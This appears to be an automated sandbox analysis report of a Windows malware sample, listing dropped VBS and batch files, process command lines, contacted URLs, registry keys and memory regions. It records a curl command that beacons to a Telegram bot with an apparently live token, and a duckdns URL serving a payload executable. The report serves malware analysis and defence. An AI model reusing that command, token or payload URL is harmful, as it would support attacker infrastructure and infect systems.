Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmp.vbs
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe"
|
||
C:\Users\user\AppData\Local\Temp\tmp.vbs
|
C:\Users\user\AppData\Local\Temp\tmp.vbs
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
|
||
C:\Windows\System32\curl.exe
|
curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://curl.se/docs/hsts.html
|
unknown
|
||
https://curl.se/docs/alt-svc.html#
|
unknown
|
||
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew
|
unknown
|
||
https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success
|
149.154.167.220
|
||
https://curl.se/docs/http-cookies.html
|
unknown
|
||
https://curl.se/docs/hsts.html#
|
unknown
|
||
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll:
|
unknown
|
||
https://ibb.co/pjHVbzL).
|
unknown
|
||
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel
|
unknown
|
||
http://decimate.onlinehey
|
unknown
|
||
https://curl.se/docs/http-cookies.html#
|
unknown
|
||
https://curl.se/docs/alt-svc.html
|
unknown
|
||
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe
|
200.165.100.3
|
||
https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151
|
unknown
|
||
http://decimate.online
|
unknown
|
There are 5 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
puredgb.duckdns.org
|
200.165.100.3
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
200.165.100.3
|
puredgb.duckdns.org
|
Brazil
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
AA8EAFF000
|
stack
|
page read and write
|
||
7FF7B0AB0000
|
unkown
|
page readonly
|
||
263EE950000
|
heap
|
page read and write
|
||
580D3FE000
|
stack
|
page read and write
|
||
263EEA81000
|
heap
|
page read and write
|
||
1FB15821000
|
heap
|
page read and write
|
||
17017E90000
|
heap
|
page read and write
|
||
7FF7B0B0B000
|
unkown
|
page read and write
|
||
1FB157A0000
|
remote allocation
|
page read and write
|
||
1FB1583B000
|
heap
|
page read and write
|
||
1FB1581E000
|
heap
|
page read and write
|
||
1FB15897000
|
heap
|
page read and write
|
||
263EEA31000
|
heap
|
page read and write
|
||
263EEA16000
|
heap
|
page read and write
|
||
263EEC8A000
|
trusted library allocation
|
page read and write
|
||
1FB157A0000
|
remote allocation
|
page read and write
|
||
263EE840000
|
heap
|
page read and write
|
||
263F2800000
|
heap
|
page read and write
|
||
263EEABE000
|
heap
|
page read and write
|
||
1FB1587E000
|
heap
|
page read and write
|
||
263EEAC1000
|
heap
|
page read and write
|
||
1FB1583B000
|
heap
|
page read and write
|
||
1FB1587E000
|
heap
|
page read and write
|
||
7FF7B329E000
|
unkown
|
page readonly
|
||
263EEA36000
|
heap
|
page read and write
|
||
AA8E6FE000
|
stack
|
page read and write
|
||
AA8E4FE000
|
stack
|
page read and write
|
||
7FF7B0B1C000
|
unkown
|
page readonly
|
||
7FF7B0AB1000
|
unkown
|
page execute read
|
||
263EEA2A000
|
heap
|
page read and write
|
||
1ACAF236000
|
heap
|
page read and write
|
||
263F08A1000
|
heap
|
page read and write
|
||
263F2902000
|
heap
|
page read and write
|
||
7FF7B0B12000
|
unkown
|
page read and write
|
||
263F2901000
|
heap
|
page read and write
|
||
7FF7B32C0000
|
unkown
|
page write copy
|
||
1ACAF208000
|
heap
|
page read and write
|
||
7FF7B0AB1000
|
unkown
|
page execute read
|
||
7FF7B32C1000
|
unkown
|
page write copy
|
||
1FB15760000
|
heap
|
page read and write
|
||
1FB1581E000
|
heap
|
page read and write
|
||
17017E70000
|
heap
|
page read and write
|
||
7FF7B0AF8000
|
unkown
|
page readonly
|
||
263EEAC5000
|
heap
|
page read and write
|
||
17017F16000
|
heap
|
page read and write
|
||
6B53FAC000
|
stack
|
page read and write
|
||
263EEA53000
|
heap
|
page read and write
|
||
1ACAF26F000
|
heap
|
page read and write
|
||
3A77CFF000
|
stack
|
page read and write
|
||
7FF7B329E000
|
unkown
|
page readonly
|
||
6B542FF000
|
stack
|
page read and write
|
||
263EEA4B000
|
heap
|
page read and write
|
||
7FF7B3220000
|
unkown
|
page readonly
|
||
1FB1583B000
|
heap
|
page read and write
|
||
3A779FE000
|
stack
|
page read and write
|
||
263EEA7B000
|
heap
|
page read and write
|
||
263F2900000
|
heap
|
page read and write
|
||
263EEAC1000
|
heap
|
page read and write
|
||
1FB1587E000
|
heap
|
page read and write
|
||
580D7FE000
|
stack
|
page read and write
|
||
17017F40000
|
heap
|
page read and write
|
||
1FB1581E000
|
heap
|
page read and write
|
||
17017E95000
|
heap
|
page read and write
|
||
263EEA7A000
|
heap
|
page read and write
|
||
AA8E8FD000
|
stack
|
page read and write
|
||
580D0FE000
|
stack
|
page read and write
|
||
1FB15800000
|
heap
|
page read and write
|
||
1ACAF2A9000
|
heap
|
page read and write
|
||
7FF7B3220000
|
unkown
|
page readonly
|
||
263F0690000
|
heap
|
page read and write
|
||
263EE9E0000
|
heap
|
page read and write
|
||
263F0630000
|
heap
|
page read and write
|
||
263F0890000
|
trusted library allocation
|
page read and write
|
||
263EEA2A000
|
heap
|
page read and write
|
||
263EEA70000
|
heap
|
page read and write
|
||
1FB15864000
|
heap
|
page read and write
|
||
1FB15818000
|
heap
|
page read and write
|
||
AA8E2F5000
|
stack
|
page read and write
|
||
17017F10000
|
heap
|
page read and write
|
||
1FB15750000
|
heap
|
page read and write
|
||
7FF7B0B1C000
|
unkown
|
page write copy
|
||
1FB15822000
|
heap
|
page read and write
|
||
7FF7B0AF8000
|
unkown
|
page readonly
|
||
1ACAF080000
|
heap
|
page read and write
|
||
1ACAF297000
|
heap
|
page read and write
|
||
1FB157B4000
|
heap
|
page read and write
|
||
1FB15818000
|
heap
|
page read and write
|
||
7FF7B3221000
|
unkown
|
page execute read
|
||
7FF7B0B18000
|
unkown
|
page readonly
|
||
263EEAD5000
|
heap
|
page read and write
|
||
263F2009000
|
heap
|
page read and write
|
||
AA8EBFC000
|
stack
|
page read and write
|
||
1FB1584F000
|
heap
|
page read and write
|
||
263EEA70000
|
heap
|
page read and write
|
||
263F2000000
|
trusted library allocation
|
page read and write
|
||
263F2008000
|
heap
|
page read and write
|
||
263EEAB7000
|
heap
|
page read and write
|
||
7FF7B0B0B000
|
unkown
|
page write copy
|
||
1ACAF180000
|
heap
|
page read and write
|
||
AA8E2EE000
|
stack
|
page read and write
|
||
1FB1584C000
|
heap
|
page read and write
|
||
1ACAF160000
|
heap
|
page read and write
|
||
7FF7B32C5000
|
unkown
|
page readonly
|
||
263EEAB7000
|
heap
|
page read and write
|
||
17017D70000
|
heap
|
page read and write
|
||
263EEA92000
|
heap
|
page read and write
|
||
263EECA0000
|
heap
|
page read and write
|
||
1ACAF200000
|
heap
|
page read and write
|
||
580D4FF000
|
stack
|
page read and write
|
||
263EEA81000
|
heap
|
page read and write
|
||
1FB1581D000
|
heap
|
page read and write
|
||
263EEA92000
|
heap
|
page read and write
|
||
263EEA92000
|
heap
|
page read and write
|
||
263EEAC5000
|
heap
|
page read and write
|
||
1FB15815000
|
heap
|
page read and write
|
||
7FF7B0AB0000
|
unkown
|
page readonly
|
||
1FB157B0000
|
heap
|
page read and write
|
||
17017F1C000
|
heap
|
page read and write
|
||
1FB15821000
|
heap
|
page read and write
|
||
1FB157A0000
|
remote allocation
|
page read and write
|
||
263EECA5000
|
heap
|
page read and write
|
||
1ACAF3AE000
|
heap
|
page read and write
|
||
1ACAF3A4000
|
heap
|
page read and write
|
||
263EECAE000
|
heap
|
page read and write
|
||
1ACAF3A0000
|
heap
|
page read and write
|
||
263EEA53000
|
heap
|
page read and write
|
||
580CD2A000
|
stack
|
page read and write
|
||
263EE9B4000
|
heap
|
page read and write
|
||
263EEA2B000
|
heap
|
page read and write
|
||
7FF7B0B1D000
|
unkown
|
page readonly
|
||
17017E50000
|
heap
|
page read and write
|
||
263EE930000
|
heap
|
page read and write
|
||
580D1FE000
|
stack
|
page read and write
|
||
17017F35000
|
heap
|
page read and write
|
||
263F07A0000
|
heap
|
page read and write
|
||
7FF7B3221000
|
unkown
|
page execute read
|
||
7FF7B0B18000
|
unkown
|
page readonly
|
||
263EE920000
|
heap
|
page readonly
|
||
580D9FB000
|
stack
|
page read and write
|
||
AA8E3FE000
|
stack
|
page read and write
|
||
1FB15780000
|
heap
|
page read and write
|
||
1FB15808000
|
heap
|
page read and write
|
||
3A77AFE000
|
stack
|
page read and write
|
||
263EE9B0000
|
heap
|
page read and write
|
||
7FF7B32C0000
|
unkown
|
page read and write
|
||
6B543FE000
|
stack
|
page read and write
|
||
7FF7B32C2000
|
unkown
|
page read and write
|
||
1FB15820000
|
heap
|
page read and write
|
||
263EEC71000
|
trusted library allocation
|
page read and write
|
||
7FF7B32C5000
|
unkown
|
page readonly
|
||
263EEA41000
|
heap
|
page read and write
|
||
1FB1584F000
|
heap
|
page read and write
|
||
263F2904000
|
heap
|
page read and write
|
||
1FB15850000
|
heap
|
page read and write
|
||
263EEABE000
|
heap
|
page read and write
|
||
580D8FF000
|
stack
|
page read and write
|
||
263F08A0000
|
heap
|
page read and write
|
||
1ACB0BF0000
|
heap
|
page read and write
|
||
1FB15897000
|
heap
|
page read and write
|
||
3A778FD000
|
stack
|
page read and write
|
||
AA8E9FE000
|
stack
|
page read and write
|
||
263EEA27000
|
heap
|
page read and write
|
||
263EE9E8000
|
heap
|
page read and write
|
||
1FB15864000
|
heap
|
page read and write
|
||
1FB15854000
|
heap
|
page read and write
|
||
1FB15821000
|
heap
|
page read and write
|
||
7FF7B32C4000
|
unkown
|
page read and write
|
||
1FB15897000
|
heap
|
page read and write
|
||
580D6FD000
|
stack
|
page read and write
|
There are 159 hidden memdumps, click here to show them.